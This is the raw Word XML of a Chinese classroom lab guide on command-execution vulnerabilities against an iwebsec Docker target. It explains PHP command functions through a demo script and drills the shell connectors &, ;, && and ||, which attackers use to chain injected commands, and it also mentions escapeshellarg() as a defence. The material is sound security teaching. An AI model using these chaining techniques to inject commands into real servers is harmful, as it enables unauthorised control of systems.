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E6DC67">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="等线"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="heading_0"/>
      <w:bookmarkStart w:id="35" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">命令执行漏洞 5.1+5.2 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>详细操作文档</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:p w14:paraId="61330179">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>适用环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：主机直接访问 + iwebsec (Docker)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b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>靶机 IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>192.168.44.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A54504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文档用途</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：课堂教学、实验操作、实验报告直接提交</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AEB60F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
          <w:between w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126D8031">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>一、项目概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="7A0A821C">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="heading_2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. 漏洞定义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="1C4D67A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命令执行漏洞是指 Web 应用接收用户输入后未做过滤与转义，直接将可控数据拼接到系统命令中执行，导致攻击者可在服务器上执行任意系统命令，进而控制服务器、读取敏感数据、植入木马等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BAED16">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="heading_3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. 学习目标</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="05BDB5C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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掌握 PHP 中常见命令执行函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E90AAA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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掌握 Linux 常用命令连接符的用法与执行规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DA5D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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理解命令执行漏洞成因、危害与利用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D23E16">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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掌握漏洞复现方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B42155">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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掌握</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>escapeshellarg()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>防御函数的使用与原理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070CD0F">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="heading_4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3. 实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="144BB5E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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攻击机：本机主机（Windows/macOS）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66950D6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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靶机：iwebsec（Docker 容器）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAAEBB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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IP：[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>192.168.44.129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>](</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>192.168.44.129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B501BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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实验目录：/var/www/html/test_exec/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3E32DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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漏洞目录：/var/www/html/exec/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2961DB32">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
          <w:between w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426F141F">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="heading_5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>第一部分 任务 5.1 命令执行函数与命令连接符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="50963B48">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="heading_6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5.1.1 PHP 常用命令执行函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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760"/>
        <w:gridCol w:w="2760"/>
        <w:gridCol w:w="2760"/>
      </w:tblGrid>
      <w:tr w14:paraId="00F2377A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1302531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函数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234EB72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功能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AB97164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输出特点</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="68E3A9E3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70DD06F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system()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AA6A07C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执行系统命令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FA71817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直接输出到页面</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4634AE01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FA419D5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exec()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90E8F05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执行系统命令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EE0FD5D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不自动输出，存入数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="21BD42D6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12BB9B5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shell_exec()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160C9B9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执行 Shell 命令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2F8A971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返回完整字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="13AF24FB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DA3F3CF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 xml:space="preserve">反引号 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>`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D3C01E3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同 shell_exec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67FCC19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返回字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A107EAE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="heading_7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5.1.2 testExec.php 源码与逐行审计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="3D8455CC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280" w:type="dxa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9FF2C2A">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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&lt;?php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// 定义命令：查看根目录文件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$command = 'ls /';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// exec 执行，结果存入数组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exec($command, $output, $return_var);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echo "exec执行结果: ";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print_r($output);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echo "&lt;/br&gt;";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// shell_exec 执行，返回字符串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$output = shell_exec($command);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echo "shell_exec执行结果: " . $output . "&lt;/br&gt;";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// system 直接执行并输出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echo "system执行结果:";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system($command);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echo "&lt;/br&gt;";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// 反引号执行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$output = `$command`;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echo "反引号执行结果: " . $output . "&lt;/br&gt;";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// 分号 ; 依次执行多条命令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$multiple_commands = 'whoami; date';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echo "分号; 执行结果: ";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echo shell_exec($multiple_commands);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echo "&lt;/br&gt;";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// &amp;&amp; 前成功才执行后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$conditional_commands = 'cd /var/www &amp;&amp; ls';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echo "&amp;&amp; 连接符结果: ";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echo shell_exec($conditional_commands);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echo "&lt;/br&gt;";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// || 前失败才执行后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$fallback_commands = 'cd /path/does/not/exist || echo "路径不存在"';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echo "|| 连接符结果: ";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echo shell_exec($fallback_commands);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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FD41CF3">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="heading_8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>代码说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7C02B306">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>$command = 'ls /'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：设置查看根目录命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE05E4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：执行命令，结果存入数组，需打印查看。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E324854">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shell_exec()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：执行命令并返回完整字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D98E8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>system()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：直接执行并自动输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D74A866">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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反引号：功能同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shell_exec()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF2C28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：顺序执行多条命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F71B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：前一条执行成功，才执行后一条。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C4613">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：前一条执行失败，才执行后一条。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE19141">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
          <w:between w:val="single" w:color="DEE0E3" w:sz="2" w:space="0"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CECFEF8">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5.1.3 Linux 命令连接符实操练习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5CE47AD2">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="heading_10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. 和号操作符 &amp;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="6D7589B6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作用：命令后台运行，不占用终端</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="27D12E39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280" w:type="dxa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5B354CE">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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ping 127.0.0.1 -c 2 &amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61573D9A">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="heading_11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. 分号操作符；</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="676118B5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作用：顺序执行多条命令，互不影响</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="544804D2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280" w:type="dxa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1E1846C">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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echo "命令1"; echo "命令2"; ls /</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="434A1908">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="heading_12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3. 逻辑与 &amp;&amp;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5FBE6CA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作用：前成功 → 后执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
      <w:tr w14:paraId="5DF09EE8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280" w:type="dxa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E100C7B">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:color w:val="646A73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cd /var/www &amp;&amp; ls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="481362E1">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4. 逻辑或 ||</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="65D98E1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作用：前失败 → 后执行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2"/>
        <w:tblW w:w="0" w:type="auto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8280"/>
      </w:tblGrid>
